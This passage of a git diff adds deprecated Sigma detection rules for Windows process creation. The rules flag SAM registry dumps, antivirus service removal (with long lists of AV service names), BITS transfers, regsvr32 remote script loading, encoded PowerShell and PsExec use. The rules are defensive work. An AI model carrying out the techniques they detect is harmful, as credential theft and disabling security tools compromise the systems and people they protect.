https://twitter.com/cyb3rops/status/1063072865992523776 +author: Florian Roth (Nextron Systems) +date: 2018/11/17 +modified: 2023/04/06 +tags: + - attack.defense_evasion + - attack.t1027 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: + - OiCAAAAYInlM + - OiJAAAAYInlM + condition: process_creation and selection +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_bitsjob.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_bitsjob.yml new file mode 100644 index 000000000..5e4c46a95 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_bitsjob.yml @@ -0,0 +1,35 @@ +title: Suspicious Bitsadmin Job via PowerShell +id: f67dbfce-93bc-440d-86ad-a95ae8858c90 +status: deprecated +description: Detect download by BITS jobs via PowerShell +references: + - https://eqllib.readthedocs.io/en/latest/analytics/ec5180c9-721a-460f-bddc-27539a284273.html + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md +author: Endgame, JHasenbusch (ported to sigma for oscd.community) +date: 2018/10/30 +modified: 2022/11/21 +tags: + - attack.defense_evasion + - attack.persistence + - attack.t1197 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: Start-BitsTransfer + NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + condition: process_creation and selection +fields: + - SubjectUserName + - ComputerName + - CommandLine +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_service_modification.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_service_modification.yml new file mode 100644 index 000000000..358f7499e --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_service_modification.yml @@ -0,0 +1,44 @@ +title: Stop Or Remove Antivirus Service +id: 6783aa9e-0dc3-49d4-a94a-8b39c5fd700b +status: deprecated +description: | + Detects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services. + Adversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md + - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/ +author: frack113 +date: 2021/07/07 +modified: 2023/03/04 +tags: + - attack.defense_evasion + - attack.t1562.001 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_action: + CommandLine|contains: + - 'Stop-Service ' + - 'Remove-Service ' + selection_product: + CommandLine|contains: + # Feel free to add more service name + - ' McAfeeDLPAgentService' + - ' Trend Micro Deep Security Manager' + - ' TMBMServer' + - Sophos + - Symantec + condition: process_creation and (all of selection*) +fields: + - SubjectUserName + - ComputerName + - CommandLine + - ParentCommandLine +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_xor_encoded_command.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_xor_encoded_command.yml new file mode 100644 index 000000000..36826b2d0 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_xor_encoded_command.yml @@ -0,0 +1,40 @@ +title: Potential Xor Encoded PowerShell Command +id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6 +related: + - id: cdf05894-89e7-4ead-b2b0-0a5f97a90f2f + type: similar +status: deprecated +description: Detects usage of "xor" or "bxor" in combination of a "foreach" loop. This pattern is often found in encoded powershell code and commands as a way to avoid detection +references: + - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65 +author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton +date: 2022/07/06 +modified: 2023/01/30 +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_img: + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.exe + - pwsh.dll + selection_cli: + CommandLine|contains|all: + - ForEach + - Xor + condition: process_creation and (all of selection_*) +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_reg_dump_sam.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_reg_dump_sam.yml new file mode 100644 index 000000000..a8388671b --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_reg_dump_sam.yml @@ -0,0 +1,34 @@ +title: Registry Dump of SAM Creds and Secrets +id: 038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e +related: + - id: fd877b94-9bb5-4191-bb25-d79cbd93c167 + type: similar +status: deprecated +description: Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets +author: frack113 +date: 2022/01/05 +modified: 2023/02/04 +tags: + - attack.credential_access + - attack.t1003.002 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_reg: + CommandLine|contains: ' save ' + selection_key: + CommandLine|contains: + - HKLM\sam + - HKLM\system + - HKLM\security + condition: process_creation and (all of selection_*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_regsvr32_anomalies.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_regsvr32_anomalies.yml new file mode 100644 index 000000000..759fd565e --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_regsvr32_anomalies.yml @@ -0,0 +1,90 @@ +title: Regsvr32 Anomaly +id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d +status: deprecated +description: Detects various anomalies in relation to regsvr32.exe +references: + - https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html + - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ +author: Florian Roth (Nextron Systems), oscd.community, Tim Shelton +date: 2019/01/16 +modified: 2023/05/26 +tags: + - attack.defense_evasion + - attack.t1218.010 + - car.2019-04-002 + - car.2019-04-003 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection1: + CommandLine|contains: \Temp\ + NewProcessName|endswith: \regsvr32.exe + selection2: + NewProcessName|endswith: \regsvr32.exe + ParentProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - \powershell_ise.exe + selection3: + NewProcessName|endswith: \regsvr32.exe + ParentProcessName|endswith: \cmd.exe + selection4a: + CommandLine|contains|all: + - '/i:' + - http + CommandLine|endswith: scrobj.dll + NewProcessName|endswith: \regsvr32.exe + selection4b: + CommandLine|contains|all: + - '/i:' + - ftp + CommandLine|endswith: scrobj.dll + NewProcessName|endswith: \regsvr32.exe + selection5: + NewProcessName|endswith: + - \cscript.exe + - \wscript.exe + ParentProcessName|endswith: \regsvr32.exe + selection6: + CommandLine|contains: '..\..\..\Windows\System32\regsvr32.exe ' + NewProcessName|endswith: \EXCEL.EXE + selection7: + ParentProcessName|endswith: \mshta.exe + NewProcessName|endswith: \regsvr32.exe + selection8: + CommandLine|contains: + - \AppData\Local + - C:\Users\Public + NewProcessName|endswith: \regsvr32.exe + selection9: # suspicious extensions https://twitter.com/Max_Mal_/status/1542461200797163522/photo/3 + CommandLine|endswith: + - .jpg + - .jpeg + - .png + - .gif + - .bin + - .tmp + - .temp + - .txt + NewProcessName|endswith: \regsvr32.exe + filter1: + CommandLine|contains: + - \AppData\Local\Microsoft\Teams + - \AppData\Local\WebEx\WebEx64\Meetings\atucfobj.dll + filter2: + CommandLine|contains: \Program Files\Box\Box\Temp\ + ParentProcessName: C:\Program Files\Box\Box\FS\streem.exe + filter_legitimate: + CommandLine|endswith: /s C:\Windows\System32\RpcProxy\RpcProxy.dll + condition: process_creation and (1 of selection* and not 1 of filter*) +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_renamed_paexec.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_renamed_paexec.yml new file mode 100644 index 000000000..7923e73d0 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_renamed_paexec.yml @@ -0,0 +1,43 @@ +title: Renamed PaExec Execution +id: 7b0666ad-3e38-4e3d-9bab-78b06de85f7b +status: deprecated +description: Detects execution of renamed paexec via imphash and executable product string +references: + - sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc + - https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf +author: Jason Lynch +date: 2019/04/17 +modified: 2023/02/14 +tags: + - attack.defense_evasion + - attack.t1036.003 + - attack.g0046 + - car.2013-05-009 + - attack.execution + - attack.t1569.002 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + - Product|contains: PAExec + - Imphash: + - 11D40A7B7876288F919AB819CC2D9802 + - 6444f8a34e99b8f7d9647de66aabe516 + - dfd6aa3f7b2b1035b76b718f1ddc689f + - 1a6cca4d5460b1710a12dea39e4a592c + - Hashes|contains: + - IMPHASH=11D40A7B7876288F919AB819CC2D9802 + - IMPHASH=6444f8a34e99b8f7d9647de66aabe516 + - IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f + - IMPHASH=1a6cca4d5460b1710a12dea39e4a592c + filter: + NewProcessName|contains: paexec + condition: process_creation and (selection and not filter) +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_root_certificate_installed.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_root_certificate_installed.yml new file mode 100644 index 000000000..3de7a8d9e --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_root_certificate_installed.yml @@ -0,0 +1,37 @@ +title: Root Certificate Installed +id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc +related: + - id: 42821614-9264-4761-acfc-5772c3286f76 + type: derived +status: deprecated +description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md +author: oscd.community, @redcanary, Zach Stanford @svch0st +date: 2020/10/10 +modified: 2023/03/05 +tags: + - attack.defense_evasion + - attack.t1553.004 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection1: + CommandLine|contains|all: + - -addstore + - root + NewProcessName|endswith: \certutil.exe + selection2: + CommandLine|contains|all: + - /add + - root + NewProcessName|endswith: \CertMgr.exe + condition: process_creation and (selection1 or selection2) +falsepositives: + - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_run_from_zip.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_run_from_zip.yml new file mode 100644 index 000000000..90a1cad90 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_run_from_zip.yml @@ -0,0 +1,26 @@ +title: Run from a Zip File +id: 1a70042a-6622-4a2b-8958-267625349abf +status: deprecated +description: Payloads may be compressed, archived, or encrypted in order to avoid detection +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-4---execution-from-compressed-file +author: frack113 +date: 2021/12/26 +modified: 2023/03/05 +tags: + - attack.impact + - attack.t1485 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + NewProcessName|contains: .zip\ + condition: process_creation and selection +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_sc_delete_av_services.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_sc_delete_av_services.yml new file mode 100644 index 000000000..d41ee86f3 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_sc_delete_av_services.yml @@ -0,0 +1,123 @@ +title: Suspicious Execution of Sc to Delete AV Services +id: 7fd4bb39-12d0-45ab-bb36-cebabc73dc7b +status: deprecated +description: Detects when attackers use "sc.exe" to delete AV services from the system in order to avoid detection +references: + - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/08/01 +modified: 2023/03/04 +tags: + - attack.execution + - attack.defense_evasion + - attack.t1562.001 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_img: + - NewProcessName|endswith: \sc.exe + - OriginalFileName: sc.exe + selection_cli: + CommandLine|contains: ' delete ' + selection_av_process: + CommandLine|contains: + # Delete Service 'AVG' + - AvgAdminServer + - AVG Antivirus + - MBEndpointAgent + # Delete Service 'Malwarebytes' + - MBAMService + - MBCloudEA + - avgAdminClient + # Delete Service 'Sophos' + - SAVService + - SAVAdminService + - Sophos AutoUpdate Service + - Sophos Clean Service + - Sophos Device Control Service + - Sophos File Scanner Service + - Sophos Health Service + - Sophos MCS Agent + - Sophos MCS Client + - SntpService + - swc_service + - swi_service + - Sophos UI + - swi_update + - Sophos Web Control Service + - Sophos System Protection Service + - Sophos Safestore Service + - hmpalertsvc + - RpcEptMapper + - Sophos Endpoint Defense Service + - SophosFIM + - swi_filter + # Delete Service 'FireBird' + - FirebirdGuardianDefaultInstance + - FirebirdServerDefaultInstance + # Delete Service 'Webroot' + - WRSVC + # Delete Service 'ESET' + - ekrn + - ekrnEpsw + # Delete Service 'Kaspersky' + - klim6 + - AVP18.0.0 + - KLIF + - klpd + - klflt + - klbackupdisk + - klbackupflt + - klkbdflt + - klmouflt + - klhk + - KSDE1.0.0 + - kltap + # Delete Service 'Quick Heal' + - ScSecSvc + - Core Mail Protection + - Core Scanning Server + - Core Scanning ServerEx + - Online Protection System + - RepairService + - Core Browsing Protection + - Quick Update Service + # Delete Service 'McAfee' + - McAfeeFramework + - macmnsvc + - masvc + - mfemms + - mfevtp + # Delete Service 'Trend Micro' + - TmFilter + - TMLWCSService + - tmusa + - TmPreFilter + - TMSmartRelayService + - TMiCRCScanService + - VSApiNt + - TmCCSF + - tmlisten + - TmProxy + - ntrtscan + - ofcservice + - TmPfw + - PccNTUpd + # Delete Service 'Panda' + - PandaAetherAgent + - PSUAService + - NanoServiceMain + - EPIntegrationService + - EPProtectedService + - EPRedline + - EPSecurityService + - EPUpdateService + condition: process_creation and (all of selection*) +falsepositives: + - Legitimate software deleting using the same method of deletion (Add it to a filter if you find cases as such) +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_schtasks_user_temp.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_schtasks_user_temp.yml new file mode 100644 index 000000000..74de89438 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_schtasks_user_temp.yml @@ -0,0 +1,34 @@ +title: Suspicious Add Scheduled Task From User AppData Temp +id: 43f487f0-755f-4c2a-bce7-d6d2eec2fcf8 +status: deprecated +description: schtasks.exe create task from user AppData\Local\Temp +references: + - malware analyse https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04 +author: frack113 +date: 2021/11/03 +modified: 2023/03/14 +tags: + - attack.execution + - attack.t1053.005 +logsource: + product: windows + category: process_creation +detection: + process_creation: + EventID: 4688 + Channel: Security + schtasks: + NewProcessName|endswith: \schtasks.exe + option: + CommandLine|contains|all: + - '/Create ' + - \AppData\Local\Temp + filter_klite_codec: + CommandLine|contains|all: + - '/Create /TN "klcp_update" /XML ' + - \klcp_update_task.xml + condition: process_creation and (schtasks and option and not 1 of filter_*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_service_stop.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_service_stop.yml new file mode 100644 index 000000000..8c760ed60 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_service_stop.yml @@ -0,0 +1,49 @@ +title: Stop Windows Service +id: eb87818d-db5d-49cc-a987-d5da331fbd90 +status: deprecated +description: Detects a Windows service to be stopped +author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali +date: 2019/10/23 +modified: 2023/03/05 +tags: + - attack.impact + - attack.t1489 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_sc_net_img: + - OriginalFileName: + - sc.exe + - net.exe + - net1.exe + - NewProcessName|endswith: + - \sc.exe + - \net.exe + - \net1.exe + selection_sc_net_cli: + CommandLine|contains: ' stop ' + selection_pwsh: + CommandLine|contains: 'Stop-Service ' + NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + filter: + CommandLine: + - sc stop KSCWebConsoleMessageQueue # kaspersky Security Center Web Console double space between sc and stop + - sc stop LGHUBUpdaterService # Logitech LGHUB Updater Service + SubjectUserName|contains: # covers many language settings + - AUTHORI + - AUTORI + condition: process_creation and ((all of selection_sc_net* and not filter) or selection_pwsh) +fields: + - SubjectUserName + - ComputerName + - CommandLine +falsepositives: + - Administrator shutting down the service due to upgrade or removal purposes +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_bitstransfer.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_bitstransfer.yml new file mode 100644 index 000000000..6ea020f40 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_bitstransfer.yml @@ -0,0 +1,33 @@ +title: Suspicious Bitstransfer via PowerShell +id: cd5c8085-4070-4e22-908d-a5b3342deb74 +status: deprecated +description: Detects transferring files from system on a server bitstransfer Powershell cmdlets +references: + - https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps +author: Austin Songer @austinsonger +date: 2021/08/19 +modified: 2023/01/10 +tags: + - attack.exfiltration + - attack.persistence + - attack.t1197 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: + - Get-BitsTransfer + - Add-BitsFile + NewProcessName|endswith: + - \powershell.exe + - \powershell_ise.exe + - \pwsh.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml new file mode 100644 index 000000000..7f71f3bf5 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml @@ -0,0 +1,32 @@ +title: Suspicious Cmd Execution via WMI +id: e31f89f7-36fb-4697-8ab6-48823708353b +status: deprecated +description: Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement. +references: + - https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html +author: Tim Rauch +date: 2022/09/27 +modified: 2023/01/19 +tags: + - attack.execution + - attack.t1047 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: \\\\127.0.0.1\\ + NewProcessName|endswith: \cmd.exe + ParentProcessName|endswith: \WmiPrvSE.exe + selection_opt: + CommandLine|contains: + - 2>&1 + - 1> + condition: process_creation and (all of selection*) +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_commandline_chars.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_commandline_chars.yml new file mode 100644 index 000000000..ca6ecabd8 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_commandline_chars.yml @@ -0,0 +1,36 @@ +title: Suspicious Characters in CommandLine +id: 2c0d2d7b-30d6-4d14-9751-7b9113042ab9 +status: deprecated +description: Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion +references: + - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation +author: Florian Roth (Nextron Systems) +date: 2022/04/27 +modified: 2023/03/03 +tags: + - attack.defense_evasion +logsource: + product: windows + category: process_creation +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_spacing_modifiers: + CommandLine|contains: # spacing modifier letters that get auto-replaced + - ˣ # 0x02E3 + - ˪ # 0x02EA + - ˢ # 0x02E2 + selection_unicode_slashes: # forward slash alternatives + CommandLine|contains: + - ∕ # 0x22FF + - ⁄ # 0x206F + selection_unicode_hyphens: # hyphen alternatives + CommandLine|contains: + - ― # 0x2015 + - — # 0x2014 + condition: process_creation and (1 of selection*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml new file mode 100644 index 000000000..cb7b132a3 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml @@ -0,0 +1,45 @@ +title: Wscript Execution from Non C Drive +id: 5b80cf53-3a46-4adc-960b-05ec19348d74 +status: deprecated +description: Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file. +references: + - https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt + - https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/ +author: Aaron Herman +date: 2022/10/01 +modified: 2023/08/29 +tags: + - attack.execution + - attack.t1059 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_lolbin: + NewProcessName|endswith: + - \wscript.exe + - \cscript.exe + selection_exetensions: + CommandLine|contains: + - .js + - .vbs + - .vbe + selection_drive_path: + CommandLine|contains: :\ + filter_drive_path: + CommandLine|contains: + - ' C:\\' + - " 'C:\\" + - ' "C:\\' + filter_env_vars: + CommandLine|contains: '%' + filter_unc_paths: + CommandLine|contains: ' \\\\' + condition: process_creation and (all of selection_* and not 1 of filter_*) +falsepositives: + - Legitimate scripts located on other partitions such as "D:" +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_run_folder.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_run_folder.yml new file mode 100644 index 000000000..4509714ea --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_run_folder.yml @@ -0,0 +1,40 @@ +title: Process Start From Suspicious Folder +id: dca91cfd-d7ab-4c66-8da7-ee57d487b35b +status: deprecated +description: Detects process start from rare or uncommon folders like temporary folder or folders that usually don't contain executable files +references: + - Malware sandbox results +author: frack113 +date: 2022/02/11 +modified: 2022/11/03 +tags: + - attack.execution + - attack.t1204 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + NewProcessName|contains: + - \Desktop\ + - \Temp\ + - \Temporary Internet + filter_parent: + - ParentProcessName: + - C:\Windows\System32\cleanmgr.exe + - C:\Program Files (x86)\Microsoft Visual Studio\Installer\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe + - C:\Windows\System32\dxgiadaptercache.exe + - ParentProcessName|startswith: C:\Program Files (x86)\NVIDIA Corporation\ + filter_other: + NewProcessName|endswith: setup.exe + filter_edge: + NewProcessName|startswith: C:\Program Files (x86)\Microsoft\Temp\ + NewProcessName|endswith: .tmp\MicrosoftEdgeUpdate.exe + condition: process_creation and (selection and not 1 of filter*) +falsepositives: + - Installers are expected to be run from the "AppData\Local\Temp" and "C:\Windows\Temp\" directories +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_squirrel_lolbin.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_squirrel_lolbin.yml new file mode 100644 index 000000000..be453a803 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_squirrel_lolbin.yml @@ -0,0 +1,86 @@ +title: Squirrel Lolbin +id: fa4b21c9-0057-4493-b289-2556416ae4d7 +status: deprecated +description: Detects Possible Squirrel Packages Manager as Lolbin +references: + - http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/ + - http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ +author: Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community +date: 2019/11/12 +modified: 2023/02/14 +tags: + - attack.execution + - attack.defense_evasion + - attack.t1218 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection1: + NewProcessName|endswith: \update.exe + selection2: + CommandLine|contains: + - --processStart + - --processStartAndWait + - --createShortcut + filter_discord: + CommandLine|contains|all: + - C:\Users\ + - \AppData\Local\Discord\Update.exe + - ' --processStart' + - Discord.exe + filter_github_desktop: + CommandLine|contains|all: + - C:\Users\ + - \AppData\Local\GitHubDesktop\Update.exe + - GitHubDesktop.exe + CommandLine|contains: + - --createShortcut + - --processStartAndWait + filter_teams: + CommandLine|contains|all: + - C:\Users\ + - \AppData\Local\Microsoft\Teams\Update.exe + - Teams.exe + CommandLine|contains: + - --processStart + - --createShortcut + condition: process_creation and (all of selection* and not 1 of filter_*) +falsepositives: + - 1Clipboard + - Beaker Browser + - Caret + - Collectie + - Discord + - Figma + - Flow + - Ghost + - GitHub Desktop + - GitKraken + - Hyper + - Insomnia + - JIBO + - Kap + - Kitematic + - Now Desktop + - Postman + - PostmanCanary + - Rambox + - Simplenote + - Skype + - Slack + - SourceTree + - Stride + - Svgsus + - WebTorrent + - WhatsApp + - WordPress.com + - Atom + - Gitkraken + - Slack + - Teams +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml new file mode 100644 index 000000000..ef3efe58e --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml @@ -0,0 +1,42 @@ +title: PsExec Tool Execution +id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba +related: + - id: 42c575ea-e41e-41f1-b248-8093c3e82a28 + type: derived +status: deprecated +description: Detects PsExec service execution via default service image name +references: + - https://www.jpcert.or.jp/english/pub/sr/ir_research.html + - https://jpcertcc.github.io/ToolAnalysisResultSheet +author: Thomas Patzke +date: 2017/06/12 +modified: 2023/02/28 +tags: + - attack.execution + - attack.t1569.002 + - attack.s0029 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + NewProcessName|endswith: \PSEXESVC.exe + SubjectUserName|contains: # covers many language settings + - AUTHORI + - AUTORI + condition: process_creation and selection +fields: + - EventID + - CommandLine + - ParentCommandLine + - ServiceName + - ServiceFileName + - TargetFilename + - PipeName +falsepositives: + - Unknown +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml new file mode 100644 index 000000000..2e5894547 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml @@ -0,0 +1,25 @@ +title: PsExec Service Start +id: 3ede524d-21cc-472d-a3ce-d21b568d8db7 +status: deprecated +description: Detects a PsExec service start +author: Florian Roth (Nextron Systems) +date: 2018/03/13 +modified: 2023/02/28 +tags: + - attack.execution + - attack.s0029 + - attack.t1569.002 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine: C:\Windows\PSEXESVC.exe + condition: process_creation and selection +falsepositives: + - Administrative activity +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_whoami_as_system.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_whoami_as_system.yml new file mode 100644 index 000000000..a45f1cabd --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_whoami_as_system.yml @@ -0,0 +1,32 @@ +title: Run Whoami as SYSTEM +id: 80167ada-7a12-41ed-b8e9-aa47195c66a1 +status: deprecated +description: Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation. +references: + - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment +author: Teymur Kheirkhabarov, Florian Roth +date: 